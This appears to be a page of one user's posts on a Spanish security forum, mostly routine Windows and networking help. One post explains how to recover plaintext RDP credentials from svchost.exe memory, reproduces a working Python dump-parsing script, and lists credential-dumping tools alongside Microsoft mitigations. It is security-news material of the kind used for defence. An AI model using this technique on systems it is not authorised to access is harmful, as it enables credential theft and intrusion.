elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 515
111  Comunicaciones / Redes / Re: Problema de conectividad de mi red Lan en: 19 Mayo 2021, 11:48 am
¿Estamos hablando de un servidor o de un ordenador personal?

Lo digo por si la conexión a internet es del proveedor ISP o de un datacenter.

Lo que tendrías que hacer es monitorizar de forma automatizada la conexión a internet.

Puedes usar algún servicio web gratuito tipo uptimerobot o similar, hay varios. Pero uptimerobot y otras gratuitas sólo permiten hacer ping cada 5 minutos. Lo ideal sería hacerlo cada minuto.

Es imposible saber si es un problema de red o es problema de internet, lo mejor es monitorizar y ver las caídas si tienen siempre la misma duración.

Monitoriza también el uso del tráfico de red del servidor, así podrás ver el gráfico de red.

¿Los micro-cortes que duración aproximada tienen?

Citar
Cuando vuelve la conexión, tiene picos muy altos de subida.

¿Picos muy altos de tráfico de subida (upload?
112  Foros Generales / Foro Libre / Re: Primer vuelo del piloto de combate artificial que reemplaza a los humanos en: 19 Mayo 2021, 11:37 am
Sobre Tesla cabe recordar que su Auto Pilot es un asistente de conducción no un sistema de conducción autónoma.

Sobre el uso de las nuevas tecnologías en uso militar:

Traje Iron-Man

Militar holandés entrena con traje volador tipo "Iron Man"



- El traje Gravity #JetSuit utiliza más de 1.000 CV de potencia de motor a reacción
- Gravity, con sede en el Reino Unido, ha realizado más de 100 eventos de vuelo y conferencias en 30 países

Gafas Realidad Aumentada

Microsoft proporcionará al #ejército de los EE.UU sus gafas realidad aumentada HoloLens - Un contrato de 21.900 millones de dólares para la realidad aumentada de uso militar - Numerosas críticas trabajadores han solicitado se cancele el acuerdo

https://blogs.microsoft.com/blog/2021/03/31/army-moves-microsoft-hololens-based-headset-from-prototyping-to-production-phase/

Gafas de visión nocturna

Visión campo de batalla con gafas de visión nocturna y realidad aumentada del ejército de EEUU

Visión campo de batalla con las nuevas gafas de visión nocturna y realidad aumentada del ejército de EEUU

- ENVG-B (Enhanced Night Vision Goggle-Binoculars)  es una cámara termográfica permite reconocimiento de objetos

113  Programación / Desarrollo Web / Re: GutHub Basic Kanban en: 19 Mayo 2021, 11:21 am
Introducción a Git (Primera Parte)
https://foro.elhacker.net/programacion_general/introduccion_a_git_primera_parte-t507860.0.html

Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)
https://foro.elhacker.net/programacion_general/usando_git_para_manipular_el_directorio_de_trabajo_el_indice_y_commits_segunda_parte-t507983.0.html

Trabajando con las ramas de git (tercera parte)
https://foro.elhacker.net/programacion_general/trabajando_con_las_ramas_de_git_tercera_parte-t508174.0.html
114  Sistemas Operativos / Windows / Re: Que ventajas tiene Windows 10 premium al Windows 10 home? en: 19 Mayo 2021, 11:00 am
Que ventajas tiene Windows 10 premium al Windows 10 home?

Se puede instalar mediante ISO Windows 10 Premium, gratis?

Windows 10 premium no existe, será Windows Pro


Diferencias entre versión Home y Professional Windows 10
https://blog.elhacker.net/2020/11/activar-windows-10-licencia-digital-diferencias-entre-windows-10-home-y-professional-saber-version-build-instalada.html

Windows 10 Home vs Windows 10 Pro: cuales son las diferencias entre ambas versiones
https://www.xataka.com/basics/windows-10-home-vs-windows-10-pro-cuales-son-las-diferencias-entre-ambas-versiones
115  Sistemas Operativos / Windows / Re: No puedo conectar a mi Red WiFi de este familiar ni por cable (blanco) ni por Red normal! en: 18 Mayo 2021, 17:29 pm
Puedes actualizar a Windows 10 desde Windows 7 de forma totalmente gratuita conservando programas y documentos, además de la licencia original activada.

Con la herramienta que comentas: Windows Media Creation Tool
MediaCreationTool20H2.exe

https://go.microsoft.com/fwlink/?LinkId=691209

https://download.microsoft.com/download/4/c/c/4cc6c15c-75a5-4d1b-a3fe-140a5e09c9ff/MediaCreationTool20H2.exe

Cuando estás haciendo la actualización te pregunta si deseas conservar programas, documentos, etc.




Explicado aquí:

Final de soporte para Windows 7 y "crypto" parche de seguridad para Windows 10
https://blog.elhacker.net/2020/01/final-de-soporte-para-windows-7-y-importante-parche-seguridad-windows-10.html

Cuando acabes la instalación tendrás que cambiarte el nombre de usuario en el foro de win_7 a win_10  (es broma)   ;D
116  Sistemas Operativos / Windows / Re: Bootear USB con WINDOWS 10 en: 18 Mayo 2021, 13:04 pm
¿De dónde has sacado o bajado la imagen ISO de Windows? Lo digo por si lo has descargado de algún sitio raro... pero si es cierto que ocupa casi 5GB e incluye todas las versiones (Home, Pro entre otras)

Diferencias entre versión Home y Professional
https://blog.elhacker.net/2020/11/activar-windows-10-licencia-digital-diferencias-entre-windows-10-home-y-professional-saber-version-build-instalada.html

La imagen ISO oficial de Windows 10 con todas las versiones ocupa unos 5GB creada con Windows Media Creation Tool
https://go.microsoft.com/fwlink/?LinkId=691209

La herramienta oficial crea y puede quemar la imagen ISO en un pendrive USB de 16GB sin ningún tipo de problema, no hace falta usar Rufus ni UltraIso ni ninguna otra herramienta. Se necesita un pendrive de mínimo 8GB.

¿El portátil con 4Gb de ram es procesador 32 o 64 bits? Es posible que hayas bajando un Windows 10 x64 y tu portátil sea 32 bits y por eso no pueda arrancar.



4 GB de RAM es memoria suficiente para instalar Windows 10, aunque no recomendable, ya es muy probable que vaya muy lento.
117  Seguridad Informática / Bugs y Exploits / Extraer credenciales RDP en memoria de svchost.exe en: 18 Mayo 2021, 12:38 pm
Es posible extraer credenciales (usuario y contraseña) de inicio de sesión en texto plano en Windows escritorio remoto (RDP) del proceso de svchost.exe

Así lo ha descubierto el investigador Jonas, famoso recientemente por descubrir dos bugs (errores) en el sistema de archivos NTFS

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html


Una simple búsqueda de cadena dentro de la memoria del proceso para svchost.exe revela la contraseña de texto sin formato que se utilizó para conectarse al sistema a través de RDP.

- La contraseña de texto sin formato está presente. La mayoría de los sistemas Windows modernos ya no tienen wdigest habilitado, por lo que encontrar credenciales de texto sin formato en la memoria es mucho más raro.
- La contraseña está en svchost.exe, a diferencia de lsass.exe. Esto significa que es posible que las herramientas defensivas para detectar / evitar el volcado de contraseñas de la memoria no puedan detectar esto.

Probé esto varias veces, así como muchas otras, y hasta ahora he observado lo siguiente:

- Esto parece funcionar en Windows 10, Windows Sever 2016, Windows Server 2012. Probablemente también en otros, pero hasta ahora lo he visto exitoso contra ellos.
- Según el autor del tweet y otros evaluadores, parece funcionar para cuentas locales y de dominio.
- No parece ser consistente. A veces, la contraseña está ahí, a veces no. No sé exactamente por qué es así. Parece existir en la memoria durante un largo período de tiempo, pero se desconoce cuánto tiempo.


Encuentra el proceso correcto. He visto algunas formas de hacerlo.

    Utilizando la herramienta Process Hacker 2. Ves a la pestaña Red y busca el proceso que tiene una conexión RDP. Esto solo funciona si la conexión RDP aún está activa.




Visto en:
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

El creador de la conocida herramienta mimikatz ha añadido recientemente la funcionalidad:





2.2.0 20210517 Terminal Server Passwords
https://github.com/gentilkiwi/mimikatz/releases

Mitigaciones:

Protect Remote Desktop credentials with Windows Defender Remote Credential Guard
https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard

Windows Defender Credential Guard: Requirements
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements


Script Python
RDP_clear.py
https://gist.github.com/k4nfr3/ca2c392572da645661b62f9a71f28ba3

Código
  1. import re
  2. from collections import namedtuple
  3. import sys
  4.  
  5. # Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
  6. # borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
  7. # code inspired by  @gentilkiwi 's video
  8. # This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
  9. # I'm no dev so PR and constructive remarks are welcome
  10.  
  11.  
  12. ASCII_BYTE = rb" !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t"
  13.  
  14. RDP_Strings = ['RDPDD', 'RDV::RDP::NetDetect::BandwidthChange']  #Server 2008 and Server 2016 tested only
  15.  
  16. String = namedtuple("String", ["s", "offset"])
  17.  
  18.  
  19. def ascii_strings(buf, n=4):
  20.    reg = rb"([%s]{%d,})" % (ASCII_BYTE, n)
  21.    ascii_re = re.compile(reg)
  22.    for match in ascii_re.finditer(buf):
  23.        yield String(match.group().decode("ascii"), match.start())
  24.  
  25. def unicode_strings(buf, n=4):
  26.    reg = rb"((?:[%s]\x00){%d,})" % (ASCII_BYTE, n)
  27.    uni_re = re.compile(reg)
  28.    for match in uni_re.finditer(buf):
  29.        try:
  30.            yield String(match.group().decode("utf-16"), match.start())
  31.        except UnicodeDecodeError:
  32.            pass
  33.  
  34.  
  35. def getdomain(buf):
  36.    return buf.decode("UTF-16)")
  37.  
  38. def banner():
  39.    print(' _____ ____  _____           _             ')
  40.    print('| __  |    \|  _  |      ___| |___ ___ ___ ')
  41.    print('|    -|  |  |   __|     |  _| | -_| .\'|  _|')
  42.    print('|__|__|____/|__|   _____|___|_|___|__,|_|  ')
  43.    print('                  |_____|                  ')
  44.  
  45.  
  46.  
  47. def main():
  48.    import sys
  49.  
  50.    SVCHOST = False
  51.    Last1 = ""
  52.    Last2 = ""
  53.    Last3 = ""
  54.    SERVERNAME=""
  55.    with open(sys.argv[1], 'rb') as f:
  56.        b = f.read()
  57.  
  58.    for s in ascii_strings(b, n=4):
  59.        if format(s.s).find("svchost.exe -k termsvcs")!=-1:
  60.            print('[*] Analyse of dump of process : {:s}'.format( s.s))
  61.            SVCHOST = True
  62.        if format(s.s).find("COMPUTERNAME=")!=-1:
  63.            #print('[+] SERVERNAME : ' +s.s[13:])
  64.            SERVERNAME=s.s[13:]
  65.            break
  66.  
  67.    if (SVCHOST):
  68.        print("\n")
  69.        for s in unicode_strings(b):
  70.            #print('[+] {:d} 0x{:d}: {:s}'.format(0,s.offset, s.s))
  71.  
  72.            if s.s in RDP_Strings:
  73.                if (s.offset - Last1.offset) < 3000:
  74.                    if (Last1.offset-Last2.offset==512):
  75.                        #print('[+] User :{:d} 0x{:d}: {:s}'.format((s.offset - Last2.offset), Last2.offset, Last2.s))
  76.                        print('[+] User : \t{:s}'.format(Last2.s))
  77.                        #print('[+] Password : {:d} 0x{:d}: {:s}'.format((s.offset - Last1.offset), Last1.offset, Last1.s))
  78.                        print('[+] Password : \t{:s}'.format(Last1.s))
  79.                        if ((Last2.offset-Last3.offset) == 512) :
  80.                            print('[+] Domain : \t{:d} 0x{:d}: {:s}'.format((s.offset - Last3.offset), Last3.offset, Last3.s))
  81.                            break
  82.                        else:
  83.                            # bug in case string is less than 4 char
  84.                            domain = b[Last2.offset-512:Last2.offset]
  85.                            if getdomain(domain).strip('\x00')!="":
  86.                                print('[+] Domain : \t{:s}'.format(getdomain(domain)))
  87.                            else:  # can be empty, then it's local
  88.                                print("[+] ServerName : \t"+SERVERNAME)
  89.                            break
  90.  
  91.            Last3=Last2
  92.            Last2=Last1
  93.            Last1=s
  94.  
  95.    else:
  96.        print(sys.argv[1] + " doesn't seem to be a svchost dump file")
  97.  
  98.  
  99. if __name__ == "__main__":
  100.    banner()
  101.    if len(sys.argv) != 2:
  102.        print("\n\nDump svchost process which listens to port 3389 port with any procdump tool")
  103.        print("")
  104.        print("Usage: " + sys.argv[0] + " svchost.dmp")
  105.        exit(0)
  106.    main()
  107.  

Otras herramientas extracción credenciales en Windows

- mimikatz https://github.com/gentilkiwi/mimikatz
- Proyecto LaZagne https://github.com/AlessandroZ/LaZagne/
- Pypykatz (mimikatz) en Python https://github.com/skelsec/pypykatz
- Nishang (PowerShell) https://github.com/samratashok/nishang
- CrackMapExec CME https://github.com/byt3bl33d3r/CrackMapExec
118  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Eliminar cosas como las etiquetas de YouTube en: 18 Mayo 2021, 12:26 pm
Si no quieres ejecutar javascript en tu navegador utiliza el complemento (plugin) NoScript, pero no es tema del foro, ya que javascript se interpreta en el navegador  de tu ordenador (en el lado del cliente)

El código que usa el foro para insertar un vídeo de youtube con las etiquetas de código es un iframe.

Muchas otras partes del foro utilizan javascript...

Citar
javascript, que normalmente debería estar desactivado.

javascript normalmente está activado, en casi todos los navegadores.

Otro temes que sea potencialmente peligroso, pero eso ya depende mucho de la página web que entres....
119  Sistemas Operativos / Windows / Re: No puedo conectar a mi Red WiFi de este familiar ni por cable (blanco) ni por Red normal! en: 18 Mayo 2021, 12:21 pm
el color del cable es irrelevante.

Citar
me sale un  mensaje de error cuando lo configuro

Copia y pega exactamente el mensaje de error que aparece

¿Qué es el método normal para ti?

¿Para que quieres conectar dos ordenadores por cable red? ¿Cuál es la finalidad?
120  Informática / Hardware / Re: duda cable HDMI y monitor en: 18 Mayo 2021, 12:13 pm
pues Windows XP (aunque obsoleto) es compatible con cualquier tipo de salida de vídeo, sea HDMI o incluso DisplayPort.

Si la tarjeta de vídeo tiene salida pues funcionará.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 515
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines